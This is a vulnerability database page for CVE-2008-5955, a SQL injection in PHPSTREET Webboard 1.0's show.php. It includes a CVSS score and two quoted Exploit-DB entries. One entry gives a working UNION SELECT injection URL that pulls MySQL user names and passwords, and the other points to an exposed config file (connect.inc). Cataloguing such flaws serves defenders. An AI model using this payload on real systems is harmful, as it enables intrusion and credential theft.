CVE-2008-5955
published 2009-01-23CVE-2008-5955: SQL injection vulnerability in show.php in Wbstreet (aka PHPSTREET Webboard) 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.7th percentile
SQL injection vulnerability in show.php in Wbstreet (aka PHPSTREET Webboard) 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpstreet | webboard | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection
exploitdb·2008-12-04
CVE-2008-5955 PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection
PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection
---
source: https://www.securityfocus.com/bid/32635/info
PHPSTREET Webboard is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user
Exploit-DB
wbstreet 1.0 - SQL Injection / File Disclosure
exploitdb·2008-12-04
CVE-2008-5956 wbstreet 1.0 - SQL Injection / File Disclosure
wbstreet 1.0 - SQL Injection / File Disclosure
---
Wbstreet v.1.0 (show.php id) Remote SQL Injection Vulnerability
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 4 December 2008
SITE : cwh.citec.us
#####################################################
APPLICATION : Wbstreet
VERSION : v.1.0
VENDOR : www.phpstreet.com
DOWNLOAD : www.ohlanla.com/Dowsload/177254922054.zip
#####################################################
-- Remote Database Disclosure --
[+] http://[Target]/[path]/connect.inc
-- Remote SQL Injection ---
No writeups or analysis indexed.
http://secunia.com/advisories/32994http://www.securityfocus.com/bid/32635https://exchange.xforce.ibmcloud.com/vulnerabilities/47073https://www.exploit-db.com/exploits/7337http://secunia.com/advisories/32994http://www.securityfocus.com/bid/32635https://exchange.xforce.ibmcloud.com/vulnerabilities/47073https://www.exploit-db.com/exploits/7337
2009-01-23
Published